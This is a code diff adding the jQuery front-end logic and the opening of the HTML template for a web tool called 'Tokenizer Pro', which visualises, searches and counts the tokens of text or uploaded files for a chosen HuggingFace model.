+
129
+ htmlContent += `</div>`; // Close tokenizer-info-grid
130
+
131
+ // Special tokens section
132
+ if (info.special_tokens && Object.keys(info.special_tokens).length > 0) {
133
+ htmlContent += `
134
+ <div class="tokenizer-info-item" style="margin-top: 0.75rem;">
135
+ <span class="tokenizer-info-label">Special Tokens</span>
136
+ <div class="special-tokens-container">`;
137
+
138
+ // Add each special token with proper escaping for HTML special characters
139
+ for (const [tokenName, tokenValue] of Object.entries(info.special_tokens)) {
140
+ // Properly escape HTML special characters
141
+ const escapedValue = tokenValue
142
+ .replace(/&/g, '&amp;')
143
+ .replace(/</g, '&lt;')
144
+ .replace(/>/g, '&gt;')
145
+ .replace(/"/g, '&quot;')
146
+ .replace(/'/g, '&#039;');
147
+
148
+ htmlContent += `
149
+ <div class="special-token-item">
150
+ <span class="token-name">${tokenName}:</span>
151
+ <span class="token-value">${escapedValue}</span>
152
+ </div>`;
153
+ }
154
+
155
+ htmlContent += `
156
+ </div>
157
+ </div>`;
158
+ }
159
+
160
+ $(targetSelector).html(htmlContent);
161
+ }
162
+
163
+ // Function to show loading overlay
164
+ function showLoadingOverlay(text = 'Loading...') {
165
+ $('#loadingText').text(text);
166
+ $('#loadingOverlay').addClass('active');
167
+ }
168
+
169
+ // Function to hide loading overlay
170
+ function hideLoadingOverlay() {
171
+ $('#loadingOverlay').removeClass('active');
172
+ }
173
+
174
+ // Function to fetch tokenizer info
175
+ function fetchTokenizerInfo(modelId, isCustom = false) {
176
+ if (!modelId) return;
177
+
178
+ const targetSelector = isCustom ? '#customTokenizerInfoContent' : '#tokenizerInfoContent';
179
+ $(targetSelector).html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
180
+
181
+ $.ajax({
182
+ url: '/tokenizer-info',
183
+ method: 'GET',
184
+ data: {
185
+ model_id: modelId,
186
+ is_custom: isCustom
187
+ },
188
+ success: function(response) {
189
+ if (response.error) {
190
+ $(targetSelector).html(`<div class="tokenizer-info-error">${response.error}</div>`);
191
+ } else {
192
+ currentTokenizerInfo = response;
193
+ updateTokenizerInfoDisplay(response, isCustom);
194
+ }
195
+ },
196
+ error: function(xhr) {
197
+ $(targetSelector).html('<div class="tokenizer-info-error">Failed to load tokenizer information</div>');
198
+ }
199
+ });
200
+ }
201
+
202
+ // Token search functionality
203
+ let searchMatches = [];
204
+ let currentSearchIndex = -1;
205
+ let searchVisible = false;
206
+
207
+ // Token frequency functionality
208
+ let tokenFrequencyData = [];
209
+ let showFrequencyChart = false;
210
+
211
+ function performTokenSearch(searchTerm) {
212
+ const tokenContainer = $('#tokenContainer');
213
+ const tokens = tokenContainer.find('.token');
214
+
215
+ // Clear previous highlights
216
+ tokens.removeClass('highlighted current');
217
+ searchMatches = [];
218
+ currentSearchIndex = -1;
219
+
220
+ if (!searchTerm.trim()) {
221
+ updateSearchCount();
222
+ return;
223
+ }
224
+
225
+ const searchLower = searchTerm.toLowerCase();
226
+
227
+ // Find matching tokens
228
+ tokens.each(function(index) {
229
+ const tokenText = $(this).text().toLowerCase();
230
+ if (tokenText.includes(searchLower)) {
231
+ $(this).addClass('highlighted');
232
+ searchMatches.push(index);
233
+ }
234
+ });
235
+
236
+ updateSearchCount();
237
+
238
+ // Navigate to first match if any
239
+ if (searchMatches.length > 0) {
240
+ navigateToMatch(0);
241
+ }
242
+ }
243
+
244
+ function navigateToMatch(index) {
245
+ if (searchMatches.length === 0) return;
246
+
247
+ // Remove current highlight
248
+ $('.token.current').removeClass('current');
249
+
250
+ // Update current index
251
+ currentSearchIndex = index;
252
+
253
+ // Highlight current match
254
+ const tokenContainer = $('#tokenContainer');
255
+ const tokens = tokenContainer.find('.token');
256
+ const currentToken = tokens.eq(searchMatches[currentSearchIndex]);
257
+ currentToken.addClass('current');
258
+
259
+ // Scroll to current match - improved logic
260
+ const scrollContainer = tokenContainer;
261
+ const containerOffset = scrollContainer.offset();
262
+ const tokenOffset = currentToken.offset();
263
+
264
+ if (containerOffset && tokenOffset) {
265
+ const containerHeight = scrollContainer.height();
266
+ const containerScrollTop = scrollContainer.scrollTop();
267
+ const tokenRelativeTop = tokenOffset.top - containerOffset.top;
268
+
269
+ // Check if token is outside visible area
270
+ if (tokenRelativeTop < 0 || tokenRelativeTop > containerHeight - 50) {
271
+ // Calculate new scroll position to center the token
272
+ const tokenHeight = currentToken.outerHeight();
273
+ const newScrollTop = containerScrollTop + tokenRelativeTop - (containerHeight / 2) + (tokenHeight / 2);
274
+
275
+ scrollContainer.animate({
276
+ scrollTop: Math.max(0, newScrollTop)
277
+ }, 400, 'swing');
278
+ }
279
+ }
280
+
281
+ updateSearchCount();
282
+ }
283
+
284
+ function toggleSearchVisibility() {
285
+ console.log('toggleSearchVisibility called, current state:', searchVisible);
286
+ searchVisible = !searchVisible;
287
+ const container = $('#tokenSearchContainer');
288
+ const toggleBtn = $('#searchToggleBtn');
289
+
290
+ console.log('Container found:', container.length, 'Toggle button found:', toggleBtn.length);
291
+
292
+ if (searchVisible) {
293
+ // Show the container first, then animate
294
+ container.show();
295
+ setTimeout(() => {
296
+ container.addClass('show');
297
+ }, 10);
298
+ toggleBtn.addClass('active');
299
+ console.log('Showing search container');
300
+ setTimeout(() => {
301
+ $('#tokenSearchInput').focus();
302
+ }, 300);
303
+ } else {
304
+ container.removeClass('show');
305
+ toggleBtn.removeClass('active');
306
+ console.log('Hiding search container');
307
+ setTimeout(() => {
308
+ container.hide();
309
+ }, 300);
310
+ // Clear search when hiding
311
+ $('#tokenSearchInput').val('');
312
+ performTokenSearch('');
313
+ }
314
+ }
315
+
316
+ function updateSearchCount() {
317
+ const countText = searchMatches.length > 0
318
+ ? `${currentSearchIndex + 1}/${searchMatches.length}`
319
+ : `0/${searchMatches.length}`;
320
+ $('#searchCount').text(countText);
321
+
322
+ // Update navigation button states
323
+ $('#prevMatch').prop('disabled', searchMatches.length === 0 || currentSearchIndex <= 0);
324
+ $('#nextMatch').prop('disabled', searchMatches.length === 0 || currentSearchIndex >= searchMatches.length - 1);
325
+ }
326
+
327
+ // Token frequency chart functions
328
+ function calculateTokenFrequency(tokens) {
329
+ const frequencyMap = {};
330
+
331
+ tokens.each(function() {
332
+ const tokenText = $(this).text();
333
+ if (tokenText.trim()) {
334
+ frequencyMap[tokenText] = (frequencyMap[tokenText] || 0) + 1;
335
+ }
336
+ });
337
+
338
+ // Convert to array and sort by frequency
339
+ const frequencyArray = Object.entries(frequencyMap)
340
+ .map(([token, count]) => ({ token, count }))
341
+ .sort((a, b) => b.count - a.count)
342
+ .slice(0, 10); // Top 10 tokens
343
+
344
+ return frequencyArray;
345
+ }
346
+
347
+ function renderFrequencyChart(frequencyData) {
348
+ const chartContainer = $('#frequencyChart');
349
+ chartContainer.empty();
350
+
351
+ if (frequencyData.length === 0) {
352
+ chartContainer.html('<div style="text-align: center; color: var(--secondary-text); padding: 1rem;">No token data available</div>');
353
+ return;
354
+ }
355
+
356
+ const maxCount = frequencyData[0].count;
357
+
358
+ frequencyData.forEach(({ token, count }) => {
359
+ const percentage = (count / maxCount) * 100;
360
+
361
+ const item = $(`
362
+ <div class="frequency-item">
363
+ <div class="frequency-token" data-token="${token}">${token}</div>
364
+ <div class="frequency-bar-container">
365
+ <div class="frequency-bar">
366
+ <div class="frequency-bar-fill" style="width: ${percentage}%"></div>
367
+ </div>
368
+ <div class="frequency-count">${count}</div>
369
+ </div>
370
+ </div>
371
+ `);
372
+
373
+ // Add click handler to search for this token
374
+ item.find('.frequency-token').click(function() {
375
+ const searchToken = $(this).data('token');
376
+ $('#tokenSearchInput').val(searchToken);
377
+ performTokenSearch(searchToken);
378
+ });
379
+
380
+ chartContainer.append(item);
381
+ });
382
+ }
383
+
384
+ function toggleFrequencyChart() {
385
+ showFrequencyChart = !showFrequencyChart;
386
+ const container = $('#frequencyChartContainer');
387
+ const chart = $('#frequencyChart');
388
+ const toggleBtn = $('#toggleFrequencyChart');
389
+
390
+ if (showFrequencyChart) {
391
+ container.show();
392
+ chart.show();
393
+ toggleBtn.text('Hide Chart').addClass('active');
394
+
395
+ // Calculate and render frequency data
396
+ const tokens = $('#tokenContainer').find('.token');
397
+ tokenFrequencyData = calculateTokenFrequency(tokens);
398
+ renderFrequencyChart(tokenFrequencyData);
399
+ } else {
400
+ chart.hide();
401
+ toggleBtn.text('Show Chart').removeClass('active');
402
+ }
403
+ }
404
+
405
+ function updateResults(data) {
406
+ $('#results').show();
407
+
408
+ // Show search toggle button and frequency chart container
409
+ $('#searchToggleBtn').show();
410
+ $('#frequencyChartContainer').show();
411
+
412
+ // Update tokens
413
+ const tokenContainer = $('#tokenContainer');
414
+ tokenContainer.empty();
415
+ data.tokens.forEach(token => {
416
+ const span = $('<span>')
417
+ .addClass('token')
418
+ .css({
419
+ 'background-color': token.colors.background,
420
+ 'color': token.colors.text
421
+ })
422
+ // Include token id in the tooltip on hover
423
+ .attr('title', `Original token: ${token.original} | Token ID: ${token.token_id}`)
424
+ .text(token.display);
425
+
426
+ tokenContainer.append(span);
427
+ if (token.newline) {
428
+ tokenContainer.append('<br>');
429
+ }
430
+ });
431
+
432
+ // Re-apply current search if any
433
+ const currentSearch = $('#tokenSearchInput').val();
434
+ if (currentSearch.trim()) {
435
+ performTokenSearch(currentSearch);
436
+ }
437
+
438
+ // Update display limit notice
439
+ if (data.display_limit_reached) {
440
+ $('#displayLimitNotice').show();
441
+ $('#totalTokenCount').text(data.total_tokens);
442
+ } else {
443
+ $('#displayLimitNotice').hide();
444
+ }
445
+
446
+ // Update preview notice
447
+ if (data.preview_only) {
448
+ $('#previewNotice').show();
449
+ } else {
450
+ $('#previewNotice').hide();
451
+ }
452
+
453
+ // Update basic stats
454
+ $('#totalTokens').text(data.stats.basic_stats.total_tokens);
455
+ $('#uniqueTokens').text(`${data.stats.basic_stats.unique_tokens} unique`);
456
+ $('#uniquePercentage').text(data.stats.basic_stats.unique_percentage);
457
+ $('#specialTokens').text(data.stats.basic_stats.special_tokens);
458
+ $('#spaceTokens').text(data.stats.basic_stats.space_tokens);
459
+ $('#spaceCount').text(data.stats.basic_stats.space_tokens);
460
+ $('#newlineCount').text(data.stats.basic_stats.newline_tokens);
461
+ $('#compressionRatio').text(data.stats.basic_stats.compression_ratio);
462
+
463
+ // Update length stats
464
+ $('#avgLength').text(data.stats.length_stats.avg_length);
465
+ $('#medianLength').text(data.stats.length_stats.median_length);
466
+ $('#stdDev').text(data.stats.length_stats.std_dev);
467
+
468
+ // Update tokenizer info if available
469
+ if (data.tokenizer_info) {
470
+ currentTokenizerInfo = data.tokenizer_info;
471
+ updateTokenizerInfoDisplay(data.tokenizer_info, currentModelType === 'custom');
472
+ }
473
+ }
474
+
475
+ // Handle text changes to detach file
476
+ $('#textInput').on('input', function() {
477
+ // Skip if file was just uploaded (prevents immediate detachment)
478
+ if (fileJustUploaded) {
479
+ fileJustUploaded = false;
480
+ return;
481
+ }
482
+
483
+ const currentText = $(this).val();
484
+ const fileInput = document.getElementById('fileInput');
485
+
486
+ // Only detach if a file exists and text has been substantially modified
487
+ if (fileInput.files.length > 0 && originalTextContent !== null) {
488
+ // Check if the text is completely different or has been significantly changed
489
+ // This allows for small edits without detaching
490
+ const isMajorChange =
491
+ currentText.length < originalTextContent.length * 0.8 || // Text reduced by at least 20%
492
+ (currentText.length > 0 &&
493
+ currentText !== originalTextContent.substring(0, currentText.length) &&
494
+ currentText.substring(0, Math.min(20, currentText.length)) !==
495
+ originalTextContent.substring(0, Math.min(20, currentText.length)));
496
+
497
+ if (isMajorChange) {
498
+ detachFile();
499
+ }
500
+ }
501
+ });
502
+
503
+ // Function to detach file
504
+ function detachFile() {
505
+ // Clear the file input
506
+ $('#fileInput').val('');
507
+ // Hide file info
508
+ $('#fileInfo').fadeOut(300);
509
+ // Reset the original content tracker
510
+ originalTextContent = $('#textInput').val();
511
+ // Reset last uploaded filename
512
+ lastUploadedFileName = null;
513
+ }
514
+
515
+ // For model changes
516
+ $('#modelSelect').change(function() {
517
+ const selectedModel = $(this).val();
518
+ $('#modelInput').val(selectedModel);
519
+
520
+ // Fetch tokenizer info for the selected model
521
+ fetchTokenizerInfo(selectedModel, false);
522
+
523
+ // If text exists, submit the form
524
+ if ($('#textInput').val().trim()) {
525
+ $('#analyzeForm').submit();
526
+ }
527
+ });
528
+
529
+ // File drop handling
530
+ const fileDropZone = $('#fileDropZone');
531
+ const fileUploadIcon = $('#fileUploadIcon');
532
+
533
+ // Prevent default drag behaviors
534
+ ['dragenter', 'dragover', 'dragleave', 'drop'].forEach(eventName => {
535
+ fileDropZone[0].addEventListener(eventName, preventDefaults, false);
536
+ document.body.addEventListener(eventName, preventDefaults, false);
537
+ });
538
+
539
+ function preventDefaults(e) {
540
+ e.preventDefault();
541
+ e.stopPropagation();
542
+ }
543
+
544
+ // Show drop zone when file is dragged over the document
545
+ document.addEventListener('dragenter', showDropZone, false);
546
+ document.addEventListener('dragover', showDropZone, false);
547
+
548
+ fileDropZone[0].addEventListener('dragleave', hideDropZone, false);
549
+ fileDropZone[0].addEventListener('drop', hideDropZone, false);
550
+
551
+ function showDropZone(e) {
552
+ fileDropZone.addClass('active');
553
+ }
554
+
555
+ function hideDropZone() {
556
+ fileDropZone.removeClass('active');
557
+ }
558
+
559
+ // Handle dropped files
560
+ fileDropZone[0].addEventListener('drop', handleDrop, false);
561
+
562
+ function handleDrop(e) {
563
+ const dt = e.dataTransfer;
564
+ const files = dt.files;
565
+ handleFiles(files);
566
+ }
567
+
568
+ // Also handle file selection via click on the icon
569
+ fileUploadIcon.on('click', function() {
570
+ const input = document.createElement('input');
571
+ input.type = 'file';
572
+ input.onchange = e => {
573
+ handleFiles(e.target.files);
574
+ };
575
+ input.click();
576
+ });
577
+
578
+ function handleFiles(files) {
579
+ if (files.length) {
580
+ const file = files[0];
581
+ currentFile = file;
582
+ lastUploadedFileName = file.name;
583
+ fileJustUploaded = true; // Set flag to prevent immediate detachment
584
+
585
+ // Show file info with animation and add detach button
586
+ $('#fileInfo').html(`${file.name} (${formatFileSize(file.size)}) <span class="file-detach" id="fileDetach"><i class="fas fa-times"></i></span>`).fadeIn(300);
587
+
588
+ // Add click handler for detach button
589
+ $('#fileDetach').on('click', function(e) {
590
+ e.stopPropagation(); // Prevent event bubbling
591
+ detachFile();
592
+ return false;
593
+ });
594
+
595
+ // Set the file to the file input
596
+ const dataTransfer = new DataTransfer();
597
+ dataTransfer.items.add(file);
598
+ document.getElementById('fileInput').files = dataTransfer.files;
599
+
600
+ // Preview in textarea (first 8096 chars)
601
+ const reader = new FileReader();
602
+ reader.onload = function(e) {
603
+ const previewText = e.target.result.slice(0, 8096);
604
+ $('#textInput').val(previewText);
605
+
606
+ // Store this as the original content AFTER setting the value
607
+ // to prevent the input event from firing and detaching immediately
608
+ setTimeout(() => {
609
+ originalTextContent = previewText;
610
+ // Automatically submit for analysis
611
+ $('#analyzeForm').submit();
612
+ }, 50);
613
+ };
614
+ reader.readAsText(file);
615
+ }
616
+ }
617
+
618
+ function formatFileSize(bytes) {
619
+ if (bytes < 1024) return bytes + ' bytes';
620
+ else if (bytes < 1048576) return (bytes / 1024).toFixed(1) + ' KB';
621
+ else return (bytes / 1048576).toFixed(1) + ' MB';
622
+ }
623
+
624
+ // Make sure to check if there's still a file when analyzing
625
+ $('#analyzeForm').on('submit', function(e) {
626
+ e.preventDefault();
627
+
628
+ // Skip detachment check if file was just uploaded
629
+ if (!fileJustUploaded) {
630
+ // Check if text has been changed but file is still attached
631
+ const textInput = $('#textInput').val();
632
+ const fileInput = document.getElementById('fileInput');
633
+
634
+ if (fileInput.files.length > 0 &&
635
+ originalTextContent !== null &&
636
+ textInput !== originalTextContent &&
637
+ textInput.length < originalTextContent.length * 0.8) {
638
+ // Text was significantly changed but file is still attached, detach it
639
+ detachFile();
640
+ }
641
+ } else {
642
+ // Reset flag after first submission
643
+ fileJustUploaded = false;
644
+ }
645
+
646
+ // Update the hidden inputs based on current model type
647
+ if (currentModelType === 'custom') {
648
+ $('#customModelInputHidden').val($('#customModelInput').val());
649
+ } else {
650
+ $('#modelInput').val($('#modelSelect').val());
651
+ }
652
+
653
+ const formData = new FormData(this);
654
+ const analyzeButton = $('#analyzeButton');
655
+ const originalButtonText = analyzeButton.text();
656
+
657
+ analyzeButton.prop('disabled', true);
658
+ analyzeButton.html(originalButtonText + '<span class="loading-spinner"></span>');
659
+ showLoadingOverlay('Analyzing text...');
660
+
661
+ $.ajax({
662
+ url: '/',
663
+ method: 'POST',
664
+ data: formData,
665
+ processData: false,
666
+ contentType: false,
667
+ success: function(response) {
668
+ if (response.error) {
669
+ showError(response.error);
670
+ } else {
671
+ updateResults(response);
672
+
673
+ // Show success badge if custom model
674
+ if (currentModelType === 'custom') {
675
+ $('#modelSuccessBadge').addClass('show');
676
+ setTimeout(() => {
677
+ $('#modelSuccessBadge').removeClass('show');
678
+ }, 3000);
679
+ }
680
+ }
681
+ },
682
+ error: function(xhr) {
683
+ showError(xhr.responseText || 'An error occurred while processing the text');
684
+ },
685
+ complete: function() {
686
+ analyzeButton.prop('disabled', false);
687
+ analyzeButton.text(originalButtonText);
688
+ hideLoadingOverlay();
689
+ }
690
+ });
691
+ });
692
+
693
+ $('#expandButton').click(function() {
694
+ const container = $('#tokenContainer');
695
+ const isExpanded = container.hasClass('expanded');
696
+
697
+ container.toggleClass('expanded');
698
+ $(this).text(isExpanded ? 'Show More' : 'Show Less');
699
+ });
700
+
701
+ // Initialize tokenizer info for current model
702
+ if (currentModelType === 'predefined') {
703
+ fetchTokenizerInfo($('#modelSelect').val(), false);
704
+ } else if ($('#customModelInput').val()) {
705
+ fetchTokenizerInfo($('#customModelInput').val(), true);
706
+ }
707
+
708
+ // Add event listener for custom model input
709
+ $('#customModelInput').on('change', function() {
710
+ const modelValue = $(this).val();
711
+ if (modelValue) {
712
+ fetchTokenizerInfo(modelValue, true);
713
+ }
714
+ });
715
+
716
+ // Keyboard shortcuts - specifically for textarea
717
+ $('#textInput').keydown(function(e) {
718
+ // Ctrl+Enter (or Cmd+Enter on Mac) to analyze
719
+ if ((e.ctrlKey || e.metaKey) && (e.keyCode === 13 || e.which === 13)) {
720
+ e.preventDefault();
721
+ if ($(this).val().trim()) {
722
+ $('#analyzeForm').submit();
723
+ }
724
+ return false;
725
+ }
726
+ });
727
+
728
+ // Global keyboard shortcuts
729
+ $(document).keydown(function(e) {
730
+ // Ctrl+F (or Cmd+F on Mac) to toggle search
731
+ if ((e.ctrlKey || e.metaKey) && (e.keyCode === 70 || e.which === 70)) {
732
+ if ($('#searchToggleBtn').is(':visible')) {
733
+ e.preventDefault();
734
+ if (!searchVisible) {
735
+ toggleSearchVisibility();
736
+ } else {
737
+ $('#tokenSearchInput').focus();
738
+ }
739
+ return false;
740
+ }
741
+ }
742
+
743
+ // Escape to close search or loading overlay
744
+ if (e.keyCode === 27 || e.which === 27) {
745
+ if (searchVisible) {
746
+ toggleSearchVisibility();
747
+ return false;
748
+ }
749
+ if ($('#loadingOverlay').hasClass('active')) {
750
+ // Don't close if there's an active request
751
+ return false;
752
+ }
753
+ }
754
+ });
755
+
756
+ // Add keyboard shortcut hint to the textarea placeholder
757
+ $('#textInput').attr('placeholder', 'Enter text to analyze or upload a file in bottom left corner... (Ctrl+Enter to analyze)');
758
+
759
+ // Token search event handlers
760
+ $('#tokenSearchInput').on('input', function() {
761
+ const searchTerm = $(this).val();
762
+ performTokenSearch(searchTerm);
763
+ });
764
+
765
+ $('#nextMatch').click(function() {
766
+ if (currentSearchIndex < searchMatches.length - 1) {
767
+ navigateToMatch(currentSearchIndex + 1);
768
+ }
769
+ });
770
+
771
+ $('#prevMatch').click(function() {
772
+ if (currentSearchIndex > 0) {
773
+ navigateToMatch(currentSearchIndex - 1);
774
+ }
775
+ });
776
+
777
+ $('#clearSearch').click(function() {
778
+ $('#tokenSearchInput').val('');
779
+ performTokenSearch('');
780
+ });
781
+
782
+ // Additional keyboard shortcuts for search
783
+ $('#tokenSearchInput').keydown(function(e) {
784
+ if (e.keyCode === 13) { // Enter
785
+ e.preventDefault();
786
+ if (e.shiftKey) {
787
+ // Shift+Enter: previous match
788
+ $('#prevMatch').click();
789
+ } else {
790
+ // Enter: next match
791
+ $('#nextMatch').click();
792
+ }
793
+ } else if (e.keyCode === 27) { // Escape
794
+ $('#clearSearch').click();
795
+ $(this).blur();
796
+ }
797
+ });
798
+
799
+ // Search toggle handler using event delegation
800
+ $(document).on('click', '#searchToggleBtn', function(e) {
801
+ console.log('Search toggle button clicked!');
802
+ e.preventDefault();
803
+ e.stopPropagation();
804
+ toggleSearchVisibility();
805
+ return false;
806
+ });
807
+
808
+ // Frequency chart toggle handler
809
+ $('#toggleFrequencyChart').click(function() {
810
+ toggleFrequencyChart();
811
+ });
812
+
813
+ // Mobile touch enhancements
814
+ function addTouchSupport() {
815
+ // Add touch-friendly double-tap for expand/collapse
816
+ let lastTap = 0;
817
+ $('#tokenContainer').on('touchend', function(e) {
818
+ const currentTime = new Date().getTime();
819
+ const tapLength = currentTime - lastTap;
820
+ if (tapLength < 500 && tapLength > 0) {
821
+ $('#expandButton').click();
822
+ e.preventDefault();
823
+ }
824
+ lastTap = currentTime;
825
+ });
826
+
827
+ // Improve touch scrolling for token container
828
+ $('#tokenContainer').on('touchstart', function(e) {
829
+ this.scrollTop = this.scrollTop;
830
+ });
831
+ }
832
+
833
+ // Check if mobile device and add touch support
834
+ if ('ontouchstart' in window || navigator.maxTouchPoints > 0) {
835
+ addTouchSupport();
836
+ }
837
+ });
app/templates/index.html ADDED
@@ -0,0 +1,213 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html>
3
+ <head>
4
+ <title>Tokenizer Pro</title>
5
+ <meta charset="UTF-8">
6
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
7
+ <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'><circle fill='%230f4f9b' cx='256' cy='256' r='256'/><g transform='translate(32 0)'><path fill='white' d='M64 128l0-32 128 0 0 128-16 0c-17.7 0-32 14.3-32 32s14.3 32 32 32l96 0c17.7 0 32-14.3 32-32s-14.3-32-32-32l-16 0 0-128 128 0 0 32c0 17.7 14.3 32 32s32-14.3 32-32l0-48c0-26.5-21.5-48-48-48L224 32 48 32C21.5 32 0 53.5 0 80l0 48c0 17.7 14.3 32 32 32s32-14.3 32-32zM9.4 361.4c-12.5 12.5-12.5 32.8 0 45.3l64 64c9.2 9.2 22.9 11.9 34.9 6.9s19.8-16.6 19.8-29.6l0-32 192 0 0 32c0 12.9 7.8 24.6 19.8 29.6s25.7 2.2 34.9-6.9l64-64c12.5-12.5 12.5-32.8 0-45.3l-64-64c-9.2-9.2-22.9-11.9-34.9-6.9s-19.8 16.6-19.8 29.6l0 32-192 0 0-32c0-12.9-7.8-24.6-19.8-29.6s-25.7-2.2-34.9 6.9l-64 64z'/></g></svg>">
8
+ <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
9
+ <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
10
+ <link rel="stylesheet" href="{{ url_for('static', filename='css/style.css') }}">
11
+ </head>
12
+ <body>
13
+ <!-- Hidden File Drop Zone that appears when dragging files -->
14
+ <div id="fileDropZone" class="file-drop-zone">
15
+ <div class="drop-indicator">
16
+ <div class="file-icon">📄</div>
17
+ <p>Drop your file here</p>
18
+ </div>
19
+ </div>
20
+
21
+ <!-- Loading overlay -->
22
+ <div id="loadingOverlay" class="loading-overlay">
23
+ <div class="loading-content">
24
+ <div class="loading-spinner large"></div>
25
+ <div class="loading-text" id="loadingText">Analyzing text...</div>
26
+ </div>
27
+ </div>
28
+
29
+ <!-- File upload icon in bottom left corner -->
30
+ <div id="fileUploadIcon" class="file-upload-icon">
31
+ <span>📎</span>
32
+ </div>
33
+ <p class="file-info" id="fileInfo"></p>
34
+
35
+ <div class="container">
36
+ <div class="header">
37
+ <div class="title-section">
38
+ <h1 class="title">Tokenizer Pro</h1>
39
+ <p class="subtitle">Advanced tokenization analysis and visualization</p>
40
+ </div>
41
+ <div class="model-selector">
42
+ <div class="model-selector-header">
43
+ <div class="model-type-toggle">
44
+ <div class="toggle-option predefined-toggle active" data-type="predefined">Predefined</div>
45
+ <div class="toggle-option custom-toggle" data-type="custom">Custom</div>
46
+ </div>
47
+ </div>
48
+ <div id="predefinedModelSelector">
49
+ <div style="position: relative;">
50
+ <div class="tokenizer-info-icon" id="modelInfoIcon" title="View tokenizer information">ℹ</div>
51
+ <!-- TOOLTIP MOVED HERE -->
52
+ <div class="tokenizer-info-tooltip" id="modelInfoTooltip">
53
+ <div id="tokenizerInfoContent">
54
+ <div class="tokenizer-info-loading">
55
+ <div class="tokenizer-info-spinner"></div>
56
+ </div>
57
+ </div>
58
+ </div>
59
+ <!-- SELECT NOW COMES AFTER ICON AND TOOLTIP -->
60
+ <select id="modelSelect" name="model">
61
+ {% for model_id, info in models.items() %}
62
+ <option value="{{ model_id }}" {% if selected_model == model_id %}selected{% endif %}>
63
+ {{ info.alias }}
64
+ </option>
65
+ {% endfor %}
66
+ </select>
67
+ </div>
68
+ </div>
69
+ <div id="customModelSelector" style="display: none;" class="custom-model-wrapper">
70
+ <div style="position: relative;">
71
+ <div class="tokenizer-info-icon" id="customModelInfoIcon" title="View tokenizer information">ℹ</div>
72
+ <div class="tokenizer-info-tooltip" id="customModelInfoTooltip">
73
+ <div id="customTokenizerInfoContent">
74
+ <div class="tokenizer-info-loading">
75
+ <div class="tokenizer-info-spinner"></div>
76
+ </div>
77
+ </div>
78
+ </div>
79
+ <input type="text" id="customModelInput" class="custom-model-input"
80
+ placeholder="Enter HuggingFace model path"
81
+ value="{{ custom_model if custom_model and custom_model|length > 0 else '' }}">
82
+ </div>
83
+ <span class="custom-model-help">?</span>
84
+ <div class="tooltip">
85
+ Enter a valid HuggingFace model ID (e.g., "mistralai/Mistral-7B-Instruct-v0.3")
86
+ The model must have a tokenizer available and must be not restricted. (with some exceptions)
87
+ Also some models have restrictions. You can use mirrored versions, like unsloth to omit that.
88
+ Like ("unsloth/Meta-Llama-3.1-8B-Instruct-bnb-4bit") instead of original path.
89
+ </div>
90
+ <div class="model-badge" id="modelSuccessBadge">Loaded</div>
91
+ </div>
92
+ </div>
93
+ </div>
94
+
95
+ <div class="error-message" id="errorMessage">{{ error }}</div>
96
+
97
+ <div class="input-section">
98
+ <div class="keyboard-shortcut-hint">Ctrl+Enter</div>
99
+ <form id="analyzeForm" method="POST" enctype="multipart/form-data">
100
+ <textarea name="text" id="textInput" placeholder="Enter text to analyze or upload a file in bottom left corner...">{{ text }}</textarea>
101
+ <input type="hidden" name="model" id="modelInput" value="{{ selected_model }}">
102
+ <input type="hidden" name="custom_model" id="customModelInputHidden" value="{{ custom_model if custom_model else '' }}">
103
+ <input type="hidden" name="model_type" id="modelTypeInput" value="{{ model_type if model_type else 'predefined' }}">
104
+ <input type="file" name="file" id="fileInput" style="display: none;">
105
+ <div class="button-container">
106
+ <button type="submit" id="analyzeButton">Analyze Text</button>
107
+ </div>
108
+ </form>
109
+ </div>
110
+
111
+ <div id="results" class="results" {% if not token_data %}style="display: none;"{% endif %}>
112
+ <div class="card">
113
+ <div class="card-header">
114
+ <h2 class="card-title">Token Visualization</h2>
115
+ <button type="button" class="search-toggle-btn" id="searchToggleBtn" title="Toggle token search" style="display: none;">
116
+ <svg width="16" height="16" viewBox="0 0 24 24" fill="currentColor">
117
+ <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/>
118
+ </svg>
119
+ </button>
120
+ </div>
121
+ <div class="token-search-container" id="tokenSearchContainer" style="display: none;">
122
+ <div class="token-search-row">
123
+ <input type="text" class="token-search-input" id="tokenSearchInput" placeholder="Search tokens...">
124
+ <div class="token-search-controls">
125
+ <button class="token-search-btn" id="prevMatch">◀</button>
126
+ <span class="token-search-count" id="searchCount">0/0</span>
127
+ <button class="token-search-btn" id="nextMatch">▶</button>
128
+ <button class="token-search-btn" id="clearSearch">Clear</button>
129
+ </div>
130
+ </div>
131
+ </div>
132
+ <div class="preview-notice" id="previewNotice">
133
+ Note: Showing preview of first 8096 characters. Stats are calculated on the full file.
134
+ </div>
135
+ <div class="token-container" id="tokenContainer">
136
+ {% if token_data %}
137
+ {% for token in token_data.tokens %}
138
+ <span class="token"
139
+ style="background-color: {{ token.colors.background }}; color: {{ token.colors.text }};"
140
+ title="Original token: {{ token.original }} | Token ID: {{ token.token_id }}">
141
+ {{ token.display }}
